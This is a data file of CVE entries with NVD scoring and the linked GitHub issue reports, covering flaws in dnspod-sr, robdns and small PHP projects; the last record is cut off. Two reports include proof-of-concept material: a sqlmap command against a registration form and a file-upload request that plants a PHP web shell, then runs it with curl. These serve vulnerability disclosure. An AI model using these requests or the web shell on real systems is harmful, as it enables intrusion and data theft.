CVE-2024-22524 | 2024-06-06T22:15:10.043 | dnspod-sr 0dfbd37 is vulnerable to buffer overflow. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/DNSPod/dnspod-sr/issues/60"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/DNSPod/dnspod-sr/issues/60"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dnspod:dnspod_security_recursive:-:*:*:*:*:*:*:*",
"matchCriteriaId": "253A7159-E2CC-4D48-BC94-DE5A7C6D28A7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/DNSPod/dnspod-sr/issues/60 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"DNSPod",
"dnspod-sr"
] | in
https://github.com/DNSPod/dnspod-sr/blob/0dfbd37b11b4c54c6665914c8751f971dbdf229e/src/init.c#L186
if `s->logpath` is not set,
https://github.com/DNSPod/dnspod-sr/blob/0dfbd37b11b4c54c6665914c8751f971dbdf229e/src/io.c#L461
will use memcpy with a null pointer and will cause
<img width="531" alt="image" src="https://github.com/DNSPod/dnspod-sr/assets/66028849/16f1ccd2-329b-4ce1-97df-32e37c94f828">
| global buffer overflow | https://api.github.com/repos/DNSPod/dnspod-sr/issues/60/comments | 0 | 2023-12-27T03:45:53Z | 2023-12-27T03:45:53Z | https://github.com/DNSPod/dnspod-sr/issues/60 | 2,056,877,351 | 60 | 6,050 |
CVE-2024-22525 | 2024-06-06T22:15:10.127 | dnspod-sr 0dfbd37 contains a SEGV. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/DNSPod/dnspod-sr/issues/61"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/DNSPod/dnspod-sr/issues/61"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dnspod:dnspod_security_recursive:-:*:*:*:*:*:*:*",
"matchCriteriaId": "253A7159-E2CC-4D48-BC94-DE5A7C6D28A7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/DNSPod/dnspod-sr/issues/61 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"DNSPod",
"dnspod-sr"
] | in
https://github.com/DNSPod/dnspod-sr/blob/0dfbd37b11b4c54c6665914c8751f971dbdf229e/tool/client.c#L81
if given a null argv[1], a segv will be triggered by memcpy
<img width="1116" alt="image" src="https://github.com/DNSPod/dnspod-sr/assets/66028849/82288557-16a5-49ce-8594-ceca5a85850a">
| SEGV on client | https://api.github.com/repos/DNSPod/dnspod-sr/issues/61/comments | 0 | 2023-12-27T04:02:23Z | 2023-12-27T04:02:23Z | https://github.com/DNSPod/dnspod-sr/issues/61 | 2,056,885,098 | 61 | 6,051 |
CVE-2024-24192 | 2024-06-06T22:15:10.213 | robdns commit d76d2e6 was discovered to contain a heap overflow via the component block->filename at /src/zonefile-insertion.c. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 2.7,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 1.2,
"impactScore": 1.4,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/robertdavidgraham/robdns/issues/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking"
],
"url": "https://github.com/robertdavidgraham/robdns/issues/8"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:robertdavidgraham:robdns:2015-12-09:*:*:*:*:*:*:*",
"matchCriteriaId": "468F3841-3FFD-4B95-A5AB-5BE25DB6066D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"125"
] | 125 | https://github.com/robertdavidgraham/robdns/issues/8 | [
"Issue Tracking"
] | github.com | [
"robertdavidgraham",
"robdns"
] | in line https://github.com/robertdavidgraham/robdns/blob/d76d2e6817ebefe240c667aecdc478d7e3fec586/src/zonefile-insertion.c#L161
in some case the size of `block->filename` will surpass the size of `parser->src.filename`, which will leak the heap information. This can be detected by ASAN.
<img width="612" alt="image" src="https://github.com/robertdavidgraham/robdns/assets/156593391/257cabb6-2a71-4939-8293-645e88af4bc5">
| heap buffer overflow | https://api.github.com/repos/robertdavidgraham/robdns/issues/8/comments | 1 | 2024-01-14T14:48:53Z | 2024-10-14T02:09:51Z | https://github.com/robertdavidgraham/robdns/issues/8 | 2,080,758,839 | 8 | 6,052 |
CVE-2024-5733 | 2024-06-07T12:15:09.190 | A vulnerability was found in itsourcecode Online Discussion Forum 1.0. It has been rated as critical. This issue affects some unknown processing of the file register_me.php. The manipulation of the argument eaddress leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-267407. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kingshao0312/cve/issues/1"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.267407"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.267407"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.351115"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kingshao0312/cve/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.267407"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.267407"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.351115"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:online_discussion_forum_project:online_discussion_forum:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "753A7DC0-ED1C-4F55-B204-582C4E09467C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/kingshao0312/cve/issues/1 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"kingshao0312",
"cve"
] | # Itsourcecode Online Discussion Forum Project in PHP with Source Code register_me.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online Discussion Forum Project in PHP with Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-discussion-forum-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ wsy0312
## Vulnerable File
+ register_me.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2015/11/bcc_forum.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'register_me.php' file of the 'Online Discussion Forum Project in PHP with Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "eaddress" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="790" alt="1" src="https://github.com/kingshao0312/cve/assets/49190143/1a4a8e40-8c2f-4de6-b6e5-bd78f38a1f09">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ Due to insufficient user input validation for the "eaddress" parameter, a serious SQL injection vulnerability was discovered in the registration function of "Online Discussion Forum Project in PHP with Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity.
# No login verification required
# Vulnerability details and POC
POST /index.php HTTP/1.1
Host: 192.168.144.199:1218
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------25987118931599180511274139744
Content-Length: 1577
Origin: http://192.168.144.199:1218
Connection: close
Referer: http://192.168.144.199:1218/index.php
Upgrade-Insecure-Requests: 1
Priority: u=1
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="fname"
123
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="mname"
123
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="lname"
123
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="gender"
Female
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="bdate"
1327-02-03
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="yearlvl"
Student
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="cnum"
123123
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="eaddress"
1213123123@q2.com
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="address"
1231231
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="idnum"
213123
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="pass"
123123
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="repass"
12312
-----------------------------25987118931599180511274139744
Content-Disposition: form-data; name="post"
-----------------------------25987118931599180511274139744--
## Vulnerability type:
+ time-based blind
## Vulnerability location:
+ 'eaddress' parameter
## Payload:
<img width="480" alt="2" src="https://github.com/kingshao0312/cve/assets/49190143/4c1e5f5e-40b2-4ece-9df3-4cbfdebff5b1">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -r 123 --batch --dbs
```
<img width="375" alt="3" src="https://github.com/kingshao0312/cve/assets/49190143/d67c38b3-2246-4f07-b8b8-cfbd3210017c">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online Discussion Forum Project in PHP with Source Code register_me.php SQL injection | https://api.github.com/repos/kingshao0312/cve/issues/1/comments | 0 | 2024-06-06T08:54:07Z | 2024-06-06T09:02:09Z | https://github.com/kingshao0312/cve/issues/1 | 2,337,719,740 | 1 | 6,053 |
CVE-2024-5734 | 2024-06-07T12:15:09.463 | A vulnerability classified as critical has been found in itsourcecode Online Discussion Forum 1.0. Affected is an unknown function of the file /members/poster.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-267408. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kingshao0312/cve/issues/2"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.267408"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.267408"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.351116"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/kingshao0312/cve/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.267408"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.267408"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.351116"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:online_discussion_forum_project:online_discussion_forum:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "753A7DC0-ED1C-4F55-B204-582C4E09467C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/kingshao0312/cve/issues/2 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"kingshao0312",
"cve"
] | # Itsourcecode Online Discussion Forum Project in PHP with Source Code poster.php Unrestricted Upload
# NAME OF AFFECTED PRODUCT(S)
+ Online Discussion Forum Project in PHP with Source Code
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-discussion-forum-project-in-php-with-source-code/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ wsy0312
## Vulnerable File
+ poster.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2015/11/bcc_forum.zip
# PROBLEM TYPE
## Vulnerability Type
+ Unrestricted Upload
## Root Cause
+ In line 120 of the poster.php file,The input obtained through $- FILES is directly used to determine the storage location of the file, without conducting a complete security check. The specific code snippet is as follows:
<img width="535" alt="1" src="https://github.com/kingshao0312/cve/assets/49190143/6544969f-09b9-47e0-a031-f8a6ddda842a">
## Impact
+ Attackers can exploit this vulnerability to upload malicious files without restriction, which can lead to file overwrite, file injection, directory traversal attacks, and denial of service attacks. Exploiting malicious files can lead to remote attacks on RCE
# DESCRIPTION
+ The file upload operation was triggered on line 120 of the "poster.php" file, and the uploaded file was received using the "$- FILES" variable. Due to the lack of appropriate input validation and cleaning, remote attackers only need to use regular user login to pass malicious payloads through this file upload function, resulting in unrestricted file uploads, which may further lead to remote code execution (RCE).
# Vulnerability details and POC
```
POST /members/poster.php HTTP/1.1
Host: 192.168.210.199:1218
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------312483722333599994122832151109
Content-Length: 738
Origin: http://192.168.210.199:1218
Connection: close
Referer: http://192.168.210.199:1218/members/poster.php
Cookie: PHPSESSID=jabnviksnmjivmindbg92d7ul7; pma_lang=zh_CN; phpMyAdmin=m2247ck38kcbu0l9o5o48levid; pmaUser-1=%7B%22iv%22%3A%22ePm47Dh1hV%2BLdrHjg1kf5A%3D%3D%22%2C%22mac%22%3A%224cf1786e2c0e5b1ed7096ad77edcd0515eb0dd08%22%2C%22payload%22%3A%22Ju8o%5C%2FvalEkTbwOwmuTw1YQ%3D%3D%22%7D; pmaAuth-1=%7B%22iv%22%3A%22kSgfNnjb%2BzFgG699ILlQxw%3D%3D%22%2C%22mac%22%3A%22112eaaeee2f0164cfb863d7506b554be2c20b402%22%2C%22payload%22%3A%220wL6EUMweGHpCy5FvlOb50zCjzOLhOSNwcpT%5C%2FmHMQwk%3D%22%7D
Upgrade-Insecure-Requests: 1
Priority: u=1
-----------------------------312483722333599994122832151109
Content-Disposition: form-data; name="topic"
WINDOWS
-----------------------------312483722333599994122832151109
Content-Disposition: form-data; name="post_title"
1231231
-----------------------------312483722333599994122832151109
Content-Disposition: form-data; name="post_content"
1231231
-----------------------------312483722333599994122832151109
Content-Disposition: form-data; name="image"; filename="abc.php"
Content-Type: application/octet-stream
<?php system("ipconfig"); ?>
-----------------------------312483722333599994122832151109
Content-Disposition: form-data; name="post"
-----------------------------312483722333599994122832151109--
```
<img width="915" alt="2" src="https://github.com/kingshao0312/cve/assets/49190143/bc645594-feec-48db-a88f-3271a627b1b5">
## I successfully executed the PHP script on the terminal
```bash
curl http://192.168.210.199:1218/post_images/abc.php
```
<img width="318" alt="3" src="https://github.com/kingshao0312/cve/assets/49190143/eaaeb6a0-422b-4a95-8d89-d973eadd6ecf"> | Itsourcecode Online Discussion Forum Project in PHP with Source Code poster.php Unrestricted Upload | https://api.github.com/repos/kingshao0312/cve/issues/2/comments | 0 | 2024-06-06T08:57:58Z | 2024-06-06T08:57:58Z | https://github.com/kingshao0312/cve/issues/2 | 2,337,730,685 | 2 | 6,054 |
CVE-2024-36673 | 2024-06-07T13:15:49.547 | Sourcecodester Pharmacy/Medical Store Point of Sale System 1.0 is vulnerable SQL Injection via login.php. This vulnerability stems from inadequate validation of user inputs for the email and password parameters, allowing attackers to inject malicious SQL queries. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"type": "Secondary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/39"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/CveSecLook/cve/issues/39"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pharmacy\\/medical_store_point_of_sale_system_project:pharmacy\\/medical_store_point_of_sale_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F27B3402-54AA-4DAF-BEF4-E6E6EB9EFEC1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
